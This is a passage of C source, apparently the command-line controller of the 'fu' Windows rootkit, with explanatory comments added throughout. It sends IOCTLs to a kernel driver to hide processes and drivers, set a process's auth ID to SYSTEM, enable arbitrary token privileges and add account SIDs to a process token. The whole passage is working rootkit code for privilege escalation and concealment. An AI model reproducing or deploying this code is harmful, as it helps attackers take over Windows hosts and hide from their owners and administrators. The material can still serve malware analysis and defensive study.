if (priv_luids == NULL)
return ERROR_INVALID_ADDRESS;
pluid_array = (PLUID_AND_ATTRIBUTES) calloc(priv_size/32, sizeof(LUID_AND_ATTRIBUTES));
if (pluid_array == NULL)
return ERROR_NOT_ENOUGH_MEMORY;
DWORD real_luid = 0;
for (int i = 0; i < priv_size/32; i++)
{
if(LookupPrivilegeValue(NULL, (char *)priv_luids + (i*32), &pluid))
{
memcpy(pluid_array+i, &pluid, sizeof(LUID));
(*(pluid_array+i)).Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT;
real_luid++;
}
}
dvars.the_pid = pid;
dvars.pluida = pluid_array;
dvars.num_luids = real_luid;
success = DeviceIoControl(gh_Device,
IOCTL_ROOTKIT_SETPRIV,
(void *) &dvars,
sizeof(dvars),
NULL,
0,
&d_bytesRead,
NULL);
if(pluid_array)
free(pluid_array);
return success;
}
DWORD SetAuthID(DWORD pid, PSID my_sid, DWORD sid_size)
{
    /* Marshals a (pid, SID, size) triple into a VARS2 request and hands it
     * to the driver with IOCTL_ROOTKIT_SETAUTHID.  The user-mode side only
     * packages the request; gh_Device is opened elsewhere (presumably by
     * InitDriver(), which is not in this excerpt) and Initialized gates
     * every call.
     *
     * Returns ERROR_NOT_READY before initialisation, ERROR_INVALID_ADDRESS
     * for a zero pid, NULL SID or zero size, and otherwise the BOOL result
     * of DeviceIoControl() widened to DWORD.  Both error codes are nonzero,
     * so a nonzero return does not by itself mean the request succeeded. */
    if (!Initialized)
        return ERROR_NOT_READY;
    if (pid == 0 || my_sid == NULL || sid_size == 0)
        return ERROR_INVALID_ADDRESS;

    VARS2 request;
    request.the_pid = pid;
    request.pSID = my_sid;
    request.d_SidSize = sid_size;

    DWORD bytes_returned;           /* required by DeviceIoControl, never read */
    DWORD result = DeviceIoControl(gh_Device,
                                   IOCTL_ROOTKIT_SETAUTHID,
                                   (void *) &request,
                                   sizeof request,
                                   NULL,
                                   0,
                                   &bytes_returned,
                                   NULL);
    return result;
}
DWORD SetSid(DWORD pid, PSID my_sid, DWORD sid_size)
{
    /* Same shape as SetAuthID() but issues IOCTL_ROOTKIT_SETSID: the
     * caller's SID buffer (my_sid, sid_size bytes) is passed to the driver
     * by pointer inside a VARS2, so it must stay valid for the duration of
     * the call.
     *
     * Returns ERROR_NOT_READY until Initialized is set,
     * ERROR_INVALID_ADDRESS when pid, my_sid or sid_size is zero/NULL, and
     * otherwise DeviceIoControl()'s BOOL as a DWORD.  The error codes and a
     * successful BOOL are all nonzero; callers in this file ignore the
     * return value. */
    if (!Initialized)
    {
        return ERROR_NOT_READY;
    }

    const int bad_args = (pid == 0) || (my_sid == NULL) || (sid_size == 0);
    if (bad_args)
    {
        return ERROR_INVALID_ADDRESS;
    }

    VARS2 request;
    request.the_pid = pid;
    request.pSID = my_sid;
    request.d_SidSize = sid_size;

    DWORD bytes_returned;           /* output-length slot; value unused */
    DWORD ok = DeviceIoControl(gh_Device,
                               IOCTL_ROOTKIT_SETSID,
                               (void *) &request,
                               sizeof(VARS2),
                               NULL,
                               0,
                               &bytes_returned,
                               NULL);
    return ok;
}
void ShowUsage()
{
    /* Writes the command-line synopsis to stdout, one line per switch.
     * The -pld/-phd lines stay commented out exactly as in the original,
     * even though main() still dispatches those switches. */
    static const char *const usage_lines[] = {
        "Usage: fu\n",
        "\t[-pl] #number to list the first #number of processes\n",
        "\t[-ph] #PID to hide the process with #PID\n",
        /* "\t[-pld] to list the named drivers\n", */
        /* "\t[-phd] DRIVER_NAME to hide the named driver\n", */
        "\t[-pas] #PID to set the AUTH_ID to SYSTEM on process #PID\n",
        "\t[-prl] to list the available privileges\n",
        "\t[-prs] #PID #privilege_name to set privileges on process #PID\n",
        "\t[-pss] #PID #account_name to add #account_name SID to process #PID token\n\n",
    };
    /* None of the lines contain a conversion specifier, so fputs() emits
     * exactly what printf() did. */
    for (size_t i = 0; i < sizeof usage_lines / sizeof usage_lines[0]; i++)
        fputs(usage_lines[i], stdout);
}
/*
 * Program entry point (non-standard `void main`; MSVC accepts it).
 * argv[1] selects one operation; the remaining arguments are forwarded to
 * the helpers (ListPriv, ListDriv, HideDriv, SetPriv, HideProc, ListProc,
 * SetAuthID, SetSid), all of which issue requests through the driver handle
 * opened by InitDriver().  The helpers' return values are never checked
 * here, so a request the helper rejects (e.g. ERROR_INVALID_ADDRESS for a
 * zero pid in SetAuthID/SetSid) fails silently.  Numeric arguments go
 * through atoi() without validation, so non-numeric input becomes 0.
 */
void main(int argc, char **argv)
{
// ListProc() output is walked in fixed 26-byte records, each printed as a
// NUL-terminated string (see -pl below).
const int PROCNAMELEN = 26;
char *buffer, *start;
if (argc > 1)
{
// InitDriver() is defined outside this excerpt; -1 is its failure value.
if (InitDriver() == -1)
return;
if (strcmp((char *)argv[1], "-prl") == 0)
ListPriv();
// -pld and -phd are still dispatched although ShowUsage() keeps their
// usage lines commented out.
else if (strcmp((char *)argv[1], "-pld") == 0)
ListDriv();
else if (strcmp((char *)argv[1], "-phd") == 0)
{
if (argc != 3)
{
ShowUsage();
return;
}
HideDriv(argv[2]);
}
else if (strcmp((char *)argv[1], "-prs") == 0)
{
// Privilege names are packed into fixed 32-byte slots, one per argv entry
// after the pid (at most 31 characters; calloc() leaves the terminator).
char *priv_array = NULL;
DWORD pid = 0;
if (argc < 4)
{
ShowUsage();
return;
}
pid = atoi(argv[2]);
priv_array = (char *)calloc(argc-3, 32);
if (priv_array == NULL)
{
fprintf(stderr, "Failed to allocate memory!\n");
return;
}
int size = 0;
// Only names starting with "Se" are copied and counted, but each one keeps
// its own argv slot (i-3).  A non-matching argument therefore leaves a
// zeroed slot in the middle while `size*32` counts slots from the front,
// so SetPriv() may be handed the empty slot and miss the last name.
for(int i = 3; i < argc; i++)
{
if(strncmp(argv[i], "Se", 2) == 0)
{
strncpy((char *)priv_array + ((i-3)*32), argv[i], 31);
size++;
}
}
SetPriv(pid, priv_array, size*32);
if(priv_array)
free(priv_array);
}
else if (strcmp((char *)argv[1], "-ph") == 0)
{
if (argc != 3)
{
ShowUsage(); //printf("You must follow -ph with the PID of the process to hide.\n");
return;
}
DWORD pid = atoi(argv[2]);
HideProc(pid);
}
else if (strcmp((char *)argv[1], "-pl") == 0)
{
if (argc != 3)
{
printf("You must follow -pl with the number of processes to list.\n");
return;
}
// `size` is first the requested record count, then reused for the byte
// count ListProc() reports, then converted back to a record count.
int size = atoi(argv[2]);
buffer = (char *)calloc(1,size * PROCNAMELEN);
if (buffer == NULL)
{
fprintf(stderr, "Failed to allocate memory!\n");
return;
}
start = buffer;
size = ListProc(buffer, size*PROCNAMELEN);
size /= PROCNAMELEN;
int ploop = 0;
// The loop prints the first size-1 records and the printf after it prints
// the last one unconditionally, so one (zeroed) record is printed even when
// size is 0, and the "Total" line reports ploop == size-1, one fewer than
// the number of records actually printed.
while(ploop < size-1)
{
printf("Process: %s\n",buffer);
buffer += PROCNAMELEN;
ploop++;
}
printf("Process: %s\n",buffer);
printf("Total number of processes = %d\n",ploop);
if(start)
free(start);
}
else if (strcmp((char *)argv[1], "-pas") == 0)
{
// Resolves the SID of the account named "System" and passes it to
// SetAuthID() for the given pid.
char *sname = "System";
DWORD d_SIDSize = 0;
DWORD d_domSize = 0;
LPTSTR lp_domName = NULL;
PSID my_SID = NULL;
PSID_NAME_USE sid_use = NULL;
BOOL success = FALSE;
DWORD pid;
if (argc > 2)
pid = atoi(argv[2]);
else
{
ShowUsage(); //printf("Missing the PID\n");
return;
}
// Two-call LookupAccountName() pattern: this first call with NULL buffers
// is relied on to fill d_SIDSize/d_domSize.  Its result is not checked, so
// if it fails for any other reason both sizes stay 0 and the allocations
// below are zero-length.
LookupAccountName(NULL,
sname,
my_SID,
&d_SIDSize,
lp_domName,
&d_domSize,
sid_use);
my_SID = (PSID) calloc(1, d_SIDSize);
if (my_SID == NULL)
{
fprintf(stderr, "Failed to allocate memory!\n");
return;
}
lp_domName = (LPTSTR) calloc(1, d_domSize*sizeof(TCHAR));
if (lp_domName == NULL)
{
if(my_SID)
free(my_SID);
fprintf(stderr, "Failed to allocate memory!\n");
return;
}
// sid_use is heap-allocated although a single enum value is all that is
// stored in it; freed on every exit path below.
sid_use = (_SID_NAME_USE *) calloc(1, sizeof(_SID_NAME_USE));
if (sid_use == NULL)
{
if(lp_domName)
free(lp_domName);
if(my_SID)
free(my_SID);
fprintf(stderr, "Failed to allocate memory!\n");
return;
}
success = LookupAccountName(NULL,
sname,
my_SID,
&d_SIDSize,
lp_domName,
&d_domSize,
sid_use);
if (!success)
{
fprintf(stderr, "Failed to lookup System SID.\n");
if(lp_domName)
free(lp_domName);
if(sid_use)
free(sid_use);
if(my_SID)
free(my_SID);
return;
}
// Return value of SetAuthID() is discarded.
SetAuthID(pid, my_SID, d_SIDSize);
if(lp_domName)
free(lp_domName);
if(sid_use)
free(sid_use);
if(my_SID)
free(my_SID);
}
else if (strcmp((char *)argv[1], "-pss") == 0)
{
// Same SID-resolution sequence as -pas, but the account name comes from
// argv[3] and the result goes to SetSid().
char *sname = NULL;
DWORD d_SIDSize = 0;
DWORD d_domSize = 0;
LPTSTR lp_domName = NULL;
PSID my_SID = NULL;
PSID_NAME_USE sid_use = NULL;
BOOL success = FALSE;
DWORD pid;
if (argc != 4)
{
ShowUsage();
return;
}
pid = atoi(argv[2]);
sname = argv[3];
// Size-query call; result unchecked (see the -pas branch).
LookupAccountName(NULL,
sname,
my_SID,
&d_SIDSize,
lp_domName,
&d_domSize,
sid_use);
my_SID = (PSID) calloc(1, d_SIDSize);
if (my_SID == NULL)
{
fprintf(stderr, "Failed to allocate memory!\n");
return;
}
lp_domName = (LPTSTR) calloc(1, d_domSize*sizeof(TCHAR));
if (lp_domName == NULL)
{
if(my_SID)
free(my_SID);
fprintf(stderr, "Failed to allocate memory!\n");
return;
}
sid_use = (_SID_NAME_USE *) calloc(1, sizeof(_SID_NAME_USE));
if (sid_use == NULL)
{
if(lp_domName)
free(lp_domName);
if(my_SID)
free(my_SID);
fprintf(stderr, "Failed to allocate memory!\n");
return;
}
success = LookupAccountName(NULL,
sname,
my_SID,
&d_SIDSize,
lp_domName,
&d_domSize,
sid_use);
if (!success)
{
fprintf(stderr, "Failed to lookup account name.\n");
if(lp_domName)
free(lp_domName);
if(sid_use)
free(sid_use);
if(my_SID)
free(my_SID);
return;
}
// Return value of SetSid() is discarded.
SetSid(pid, my_SID, d_SIDSize);
if(lp_domName)
free(lp_domName);
if(sid_use)
free(sid_use);
if(my_SID)
free(my_SID);
}
else
{
ShowUsage();
}
}
else
{
ShowUsage();
}
return;
}